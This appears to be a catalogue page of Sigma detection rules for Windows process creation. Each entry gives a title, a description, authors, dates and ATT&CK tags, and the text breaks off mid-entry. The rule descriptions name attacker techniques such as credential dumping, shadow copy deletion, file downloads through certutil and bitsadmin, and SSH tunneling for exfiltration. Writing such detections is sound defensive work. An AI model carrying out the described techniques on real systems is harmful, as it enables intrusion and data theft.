Schtasks Creation Or Modification With SYSTEM Privileges

Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges

Internal MISP references

UUID 89ca78fd-b37c-4310-b3d3-81a023f83936 which can be used as unique global reference for Schtasks Creation Or Modification With SYSTEM Privileges in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/28
falsepositive ['Unknown']
filename proc_creation_win_schtasks_system.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.persistence', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

Suspicious Greedy Compression Using Rar.EXE

Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes

Internal MISP references

UUID afe52666-401e-4a02-b4ff-5d128990b8cb which can be used as unique global reference for Suspicious Greedy Compression Using Rar.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems), Florian Roth (Nextron Systems)
creation_date 2022/12/15
falsepositive ['Unknown']
filename proc_creation_win_rar_susp_greedy_compression.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

HackTool - CrackMapExec Execution Patterns

Detects various execution patterns of the CrackMapExec pentesting framework

Internal MISP references

UUID 058f4380-962d-40a5-afce-50207d36d7e2 which can be used as unique global reference for HackTool - CrackMapExec Execution Patterns in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2020/05/22
falsepositive ['Unknown']
filename proc_creation_win_hktl_crackmapexec_execution_patterns.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047', 'attack.t1053', 'attack.t1059.003', 'attack.t1059.001', 'attack.s0106']
Related clusters

To see the related clusters, click here.

Whoami.EXE Execution From Privileged Process

Detects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors

Internal MISP references

UUID 79ce34ca-af29-4d0e-b832-fc1b377020db which can be used as unique global reference for Whoami.EXE Execution From Privileged Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Teymur Kheirkhabarov
creation_date 2022/01/28
falsepositive ['Unknown']
filename proc_creation_win_whoami_execution_from_high_priv_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.discovery', 'attack.t1033']
Related clusters

To see the related clusters, click here.

Nltest.EXE Execution

Detects nltest commands that can be used for information discovery

Internal MISP references

UUID 903076ff-f442-475a-b667-4f246bcc203b which can be used as unique global reference for Nltest.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Arun Chauhan
creation_date 2023/02/03
falsepositive ['Legitimate administration activity']
filename proc_creation_win_nltest_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1016', 'attack.t1018', 'attack.t1482']
Related clusters

To see the related clusters, click here.

Remote Access Tool - Simple Help Execution

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Internal MISP references

UUID 95e60a2b-4705-444b-b7da-ba0ea81a3ee2 which can be used as unique global reference for Remote Access Tool - Simple Help Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2024/02/23
falsepositive ['Legitimate usage of the tool']
filename proc_creation_win_remote_access_tools_simple_help.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

Shadow Copies Deletion Using Operating Systems Utilities

Shadow Copies deletion using operating systems utilities

Internal MISP references

UUID c947b146-0abc-4c87-9c64-b17e9d7274a2 which can be used as unique global reference for Shadow Copies Deletion Using Operating Systems Utilities in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)
creation_date 2019/10/22
falsepositive ['Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason', 'LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)']
filename proc_creation_win_susp_shadow_copies_deletion.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.impact', 'attack.t1070', 'attack.t1490']
Related clusters

To see the related clusters, click here.

Fsutil Drive Enumeration

Attackers may leverage fsutil to enumerated connected drives.

Internal MISP references

UUID 63de06b9-a385-40b5-8b32-73f2b9ef84b6 which can be used as unique global reference for Fsutil Drive Enumeration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
creation_date 2022/03/29
falsepositive ['Certain software or administrative tasks may trigger false positives.']
filename proc_creation_win_fsutil_drive_enumeration.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1120']
Related clusters

To see the related clusters, click here.

Lolbin Ssh.exe Use As Proxy

Detect usage of the "ssh.exe" binary as a proxy to launch other programs

Internal MISP references

UUID 7d6d30b8-5b91-4b90-a891-46cccaf29598 which can be used as unique global reference for Lolbin Ssh.exe Use As Proxy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali
creation_date 2022/12/29
falsepositive ['Legitimate usage for administration purposes']
filename proc_creation_win_lolbin_ssh.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Potential Suspicious Activity Using SeCEdit

Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy

Internal MISP references

UUID c2c76b77-32be-4d1f-82c9-7e544bdfe0eb which can be used as unique global reference for Potential Suspicious Activity Using SeCEdit in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Janantha Marasinghe
creation_date 2022/11/18
falsepositive ['Legitimate administrative use']
filename proc_creation_win_secedit_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.persistence', 'attack.defense_evasion', 'attack.credential_access', 'attack.privilege_escalation', 'attack.t1562.002', 'attack.t1547.001', 'attack.t1505.005', 'attack.t1556.002', 'attack.t1562', 'attack.t1574.007', 'attack.t1564.002', 'attack.t1546.008', 'attack.t1546.007', 'attack.t1547.014', 'attack.t1547.010', 'attack.t1547.002', 'attack.t1557', 'attack.t1082']
Related clusters

To see the related clusters, click here.

Wab Execution From Non Default Location

Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity

Internal MISP references

UUID 395907ee-96e5-4666-af2e-2ca91688e151 which can be used as unique global reference for Wab Execution From Non Default Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/12
falsepositive ['Unknown']
filename proc_creation_win_wab_execution_from_non_default_location.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution']

File Download Via Bitsadmin

Detects usage of bitsadmin downloading a file

Internal MISP references

UUID d059842b-6b9d-4ed1-b5c3-5b89143c6ede which can be used as unique global reference for File Download Via Bitsadmin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael Haag, FPT.EagleEye
creation_date 2017/03/09
falsepositive ['Some legitimate apps use this, but limited.']
filename proc_creation_win_bitsadmin_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1197', 'attack.s0190', 'attack.t1036.003']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Office Document Executed From Trusted Location

Detects the execution of an Office application that points to a document that is located in a trusted location. Attackers often used this to avoid macro security and execute their malicious code.

Internal MISP references

UUID f99abdf0-6283-4e71-bd2b-b5c048a94743 which can be used as unique global reference for Potentially Suspicious Office Document Executed From Trusted Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/21
falsepositive ['Unknown']
filename proc_creation_win_office_exec_from_trusted_locations.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Potential Suspicious Registry File Imported Via Reg.EXE

Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility

Internal MISP references

UUID 62e0298b-e994-4189-bc87-bc699aa62d97 which can be used as unique global reference for Potential Suspicious Registry File Imported Via Reg.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali
creation_date 2022/08/01
falsepositive ['Legitimate import of keys']
filename proc_creation_win_reg_import_from_suspicious_paths.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.t1112', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

Use of VSIISExeLauncher.exe

The "VSIISExeLauncher.exe" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries

Internal MISP references

UUID 18749301-f1c5-4efc-a4c3-276ff1f5b6f8 which can be used as unique global reference for Use of VSIISExeLauncher.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/09
falsepositive ['Unknown']
filename proc_creation_win_lolbin_vsiisexelauncher.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1127']
Related clusters

To see the related clusters, click here.

Regedit as Trusted Installer

Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe

Internal MISP references

UUID 883835a7-df45-43e4-bf1d-4268768afda4 which can be used as unique global reference for Regedit as Trusted Installer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/05/27
falsepositive ['Unlikely']
filename proc_creation_win_regedit_trustedinstaller.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1548']
Related clusters

To see the related clusters, click here.

Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Detects attackers using tooling with bad opsec defaults. E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run. One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.

Internal MISP references

UUID a7c3d773-caef-227e-a7e7-c2f13c622329 which can be used as unique global reference for Bad Opsec Defaults Sacrificial Processes With Improper Arguments in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)
creation_date 2020/10/23
falsepositive ['Unlikely']
filename proc_creation_win_susp_bad_opsec_sacrificial_processes.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011']
Related clusters

To see the related clusters, click here.

Suspicious File Downloaded From Direct IP Via Certutil.EXE

Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.

Internal MISP references

UUID 13e6fe51-d478-4c7e-b0f2-6da9b400a829 which can be used as unique global reference for Suspicious File Downloaded From Direct IP Via Certutil.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/15
falsepositive ['Unknown']
filename proc_creation_win_certutil_download_direct_ip.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Potential RDP Tunneling Via SSH

Execution of ssh.exe to perform data exfiltration and tunneling through RDP

Internal MISP references

UUID f7d7ebd5-a016-46e2-9c54-f9932f2d386d which can be used as unique global reference for Potential RDP Tunneling Via SSH in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/12
falsepositive ['Unknown']
filename proc_creation_win_ssh_rdp_tunneling.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1572']
Related clusters

To see the related clusters, click here.

Arbitrary File Download Via IMEWDBLD.EXE

Detects usage of "IMEWDBLD.exe" to download arbitrary files

Internal MISP references

UUID 863218bd-c7d0-4c52-80cd-0a96c09f54af which can be used as unique global reference for Arbitrary File Download Via IMEWDBLD.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel
creation_date 2023/11/09
falsepositive ['Unknown']
filename proc_creation_win_imewbdld_download.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1218']
Related clusters

To see the related clusters, click here.

REGISTER_APP.VBS Proxy Execution

Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.

Internal MISP references

UUID 1c8774a0-44d4-4db0-91f8-e792359c70bd which can be used as unique global reference for REGISTER_APP.VBS Proxy Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/19
falsepositive ["Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign"]
filename proc_creation_win_lolbin_register_app.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Suspicious Service Binary Directory

Detects a service binary running in a suspicious directory

Internal MISP references

UUID 883faa95-175a-4e22-8181-e5761aeb373c which can be used as unique global reference for Suspicious Service Binary Directory in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/03/09
falsepositive ['Unknown']
filename proc_creation_win_susp_service_dir.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Modify Group Policy Settings

Detect malicious GPO modifications can be used to implement many other malicious behaviors.

Internal MISP references

UUID ada4b0c4-758b-46ac-9033-9004613a150d which can be used as unique global reference for Modify Group Policy Settings in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/19
falsepositive ['Legitimate use']
filename proc_creation_win_reg_modify_group_policy_settings.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1484.001']
Related clusters

To see the related clusters, click here.

Renamed Vmnat.exe Execution

Detects renamed vmnat.exe or portable version that can be used for DLL side-loading

Internal MISP references

UUID 7b4f794b-590a-4ad4-ba18-7964a2832205 which can be used as unique global reference for Renamed Vmnat.exe Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author elhoim
creation_date 2022/09/09
falsepositive ['Unknown']
filename proc_creation_win_renamed_vmnat.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

HackTool - LocalPotato Execution

Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples

Internal MISP references

UUID 6bd75993-9888-4f91-9404-e1e4e4e34b77 which can be used as unique global reference for HackTool - LocalPotato Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/14
falsepositive ['Unlikely']
filename proc_creation_win_hktl_localpotato.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'cve.2023.21746']

HackTool - Impersonate Execution

Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively

Internal MISP references

UUID cf0c254b-22f1-4b2b-8221-e137b3c0af94 which can be used as unique global reference for HackTool - Impersonate Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sai Prashanth Pulisetti @pulisettis
creation_date 2022/12/21
falsepositive ['Unknown']
filename proc_creation_win_hktl_impersonate.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.defense_evasion', 'attack.t1134.001', 'attack.t1134.003']
Related clusters

To see the related clusters, click here.

Arbitrary File Download Via PresentationHost.EXE

Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files

Internal MISP references

UUID b124ddf4-778d-418e-907f-6dd3fc0d31cd which can be used as unique global reference for Arbitrary File Download Via PresentationHost.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/19
falsepositive ['Unknown']
filename proc_creation_win_presentationhost_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Suspicious Processes Spawned by Java.EXE

Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j)

Internal MISP references

UUID 0d34ed8b-1c12-4ff2-828c-16fc860b766d which can be used as unique global reference for Suspicious Processes Spawned by Java.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Andreas Hunkeler (@Karneades), Florian Roth
creation_date 2021/12/17
falsepositive ['Legitimate calls to system binaries', 'Company specific internal usage']
filename proc_creation_win_java_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.initial_access', 'attack.persistence', 'attack.privilege_escalation']

Potential Credential Dumping Attempt Using New NetworkProvider - CLI

Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it

Internal MISP references

UUID baef1ec6-2ca9-47a3-97cc-4cf2bda10b77 which can be used as unique global reference for Potential Credential Dumping Attempt Using New NetworkProvider - CLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/23
falsepositive ['Other legitimate network providers used and not filtred in this rule']
filename proc_creation_win_registry_new_network_provider.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003']
Related clusters

To see the related clusters, click here.

Use of Pcalua For Execution

Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.

Internal MISP references

UUID 0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2 which can be used as unique global reference for Use of Pcalua For Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
creation_date 2022/06/14
falsepositive ['Legitimate use by a via a batch script or by an administrator.']
filename proc_creation_win_lolbin_pcalua.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Install New Package Via Winget Local Manifest

Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them. The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe, msi or msix files later.

Internal MISP references

UUID 313d6012-51a0-4d93-8dfc-de8553239e25 which can be used as unique global reference for Install New Package Via Winget Local Manifest in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sreeman, Florian Roth (Nextron Systems), frack113
creation_date 2020/04/21
falsepositive ['Some false positives are expected in some environment that may use this functionality to install and test their custom applications']
filename proc_creation_win_winget_local_install_via_manifest.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Non-privileged Usage of Reg or Powershell

Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry

Internal MISP references

UUID 8f02c935-effe-45b3-8fc9-ef8696a9e41d which can be used as unique global reference for Non-privileged Usage of Reg or Powershell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community
creation_date 2020/10/05
falsepositive ['Unknown']
filename proc_creation_win_susp_non_priv_reg_or_ps.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Usage Of Web Request Commands And Cmdlets

Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine

Internal MISP references

UUID 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d which can be used as unique global reference for Usage Of Web Request Commands And Cmdlets in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
creation_date 2019/10/24
falsepositive ['Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer.']
filename proc_creation_win_susp_web_request_cmd_and_cmdlets.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Using SettingSyncHost.exe as LOLBin

Detects using SettingSyncHost.exe to run hijacked binary

Internal MISP references

UUID b2ddd389-f676-4ac4-845a-e00781a48e5f which can be used as unique global reference for Using SettingSyncHost.exe as LOLBin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Anton Kutepov, oscd.community
creation_date 2020/02/05
falsepositive ['Unknown']
filename proc_creation_win_lolbin_settingsynchost.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1574.008']
Related clusters

To see the related clusters, click here.

Suspicious Process Parents

Detects suspicious parent processes that should not have any children or should only have a single possible child program

Internal MISP references

UUID cbec226f-63d9-4eca-9f52-dfb6652f24df which can be used as unique global reference for Suspicious Process Parents in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/21
falsepositive ['Unknown']
filename proc_creation_win_susp_parents.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

Powershell Defender Exclusion

Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets

Internal MISP references

UUID 17769c90-230e-488b-a463-e05c08e9d48f which can be used as unique global reference for Powershell Defender Exclusion in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/04/29
falsepositive ['Possible Admin Activity', 'Other Cmdlets that may use the same parameters']
filename proc_creation_win_powershell_defender_exclusion.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Arbitrary Binary Execution Using GUP Utility

Detects execution of the Notepad++ updater (gup) to launch other commands or executables

Internal MISP references

UUID d65aee4d-2292-4cea-b832-83accd6cfa43 which can be used as unique global reference for Arbitrary Binary Execution Using GUP Utility in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/10
falsepositive ['Other parent binaries using GUP not currently identified']
filename proc_creation_win_gup_arbitrary_binary_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Suspicious CodePage Switch Via CHCP

Detects a code page switch in command line or batch scripts to a rare language

Internal MISP references

UUID c7942406-33dd-4377-a564-0f62db0593a3 which can be used as unique global reference for Suspicious CodePage Switch Via CHCP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
creation_date 2019/10/14
falsepositive ["Administrative activity (adjust code pages according to your organization's region)"]
filename proc_creation_win_chcp_codepage_switch.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.t1036', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

Kavremover Dropped Binary LOLBIN Usage

Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.

Internal MISP references

UUID d047726b-c71c-4048-a99b-2e2f50dc107d which can be used as unique global reference for Kavremover Dropped Binary LOLBIN Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/11/01
falsepositive ['Unknown']
filename proc_creation_win_lolbin_kavremover.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1127']
Related clusters

To see the related clusters, click here.

DllUnregisterServer Function Call Via Msiexec.EXE

Detects MsiExec loading a DLL and calling its DllUnregisterServer function

Internal MISP references

UUID 84f52741-8834-4a8c-a413-2eb2269aa6c8 which can be used as unique global reference for DllUnregisterServer Function Call Via Msiexec.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/04/24
falsepositive ['Unknown']
filename proc_creation_win_msiexec_dll.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.007']
Related clusters

To see the related clusters, click here.

Password Provided In Command Line Of Net.EXE

Detects a when net.exe is called with a password in the command line

Internal MISP references

UUID d4498716-1d52-438f-8084-4a603157d131 which can be used as unique global reference for Password Provided In Command Line Of Net.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Shelton (HAWK.IO)
creation_date 2021/12/09
falsepositive ['Unknown']
filename proc_creation_win_net_use_password_plaintext.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.initial_access', 'attack.persistence', 'attack.privilege_escalation', 'attack.lateral_movement', 'attack.t1021.002', 'attack.t1078']
Related clusters

To see the related clusters, click here.

Recon Information for Export with Command Prompt

Once established within a system or network, an adversary may use automated techniques for collecting internal data.

Internal MISP references

UUID aa2efee7-34dd-446e-8a37-40790a66efd7 which can be used as unique global reference for Recon Information for Export with Command Prompt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/30
falsepositive ['Unknown']
filename proc_creation_win_susp_recon.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1119']
Related clusters

To see the related clusters, click here.

Active Directory Structure Export Via Ldifde.EXE

Detects the execution of "ldifde.exe" in order to export organizational Active Directory structure.

Internal MISP references

UUID 4f7a6757-ff79-46db-9687-66501a02d9ec which can be used as unique global reference for Active Directory Structure Export Via Ldifde.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/14
falsepositive ['Unknown']
filename proc_creation_win_ldifde_export.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.exfiltration']

Service Registry Key Deleted Via Reg.EXE

Detects execution of "reg.exe" commands with the "delete" flag on services registry key. Often used by attacker to remove AV software services

Internal MISP references

UUID 05b2aa93-1210-42c8-8d9a-2fcc13b284f5 which can be used as unique global reference for Service Registry Key Deleted Via Reg.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/01
falsepositive ['Unlikely']
filename proc_creation_win_reg_delete_services.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Potentially Suspicious GoogleUpdate Child Process

Detects potentially suspicious child processes of "GoogleUpdate.exe"

Internal MISP references

UUID 84b1ecf9-6eff-4004-bafb-bae5c0e251b2 which can be used as unique global reference for Potentially Suspicious GoogleUpdate Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/15
falsepositive ['Unknown']
filename proc_creation_win_googleupdate_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Shell32 DLL Execution in Suspicious Directory

Detects shell32.dll executing a DLL in a suspicious directory

Internal MISP references

UUID 32b96012-7892-429e-b26c-ac2bf46066ff which can be used as unique global reference for Shell32 DLL Execution in Suspicious Directory in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/11/24
falsepositive ['Unknown']
filename proc_creation_win_rundll32_shell32_susp_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1218.011']
Related clusters

To see the related clusters, click here.

Potential Active Directory Enumeration Using AD Module - ProcCreation

Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration.

Internal MISP references

UUID 70bc5215-526f-4477-963c-a47a5c9ebd12 which can be used as unique global reference for Potential Active Directory Enumeration Using AD Module - ProcCreation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/01/22
falsepositive ['Legitimate use of the library for administrative activity']
filename proc_creation_win_powershell_active_directory_module_dll_import.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.reconnaissance', 'attack.discovery', 'attack.impact']

Suspicious PowerShell Download and Execute Pattern

Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)

Internal MISP references

UUID e6c54d94-498c-4562-a37c-b469d8e9a275 which can be used as unique global reference for Suspicious PowerShell Download and Execute Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
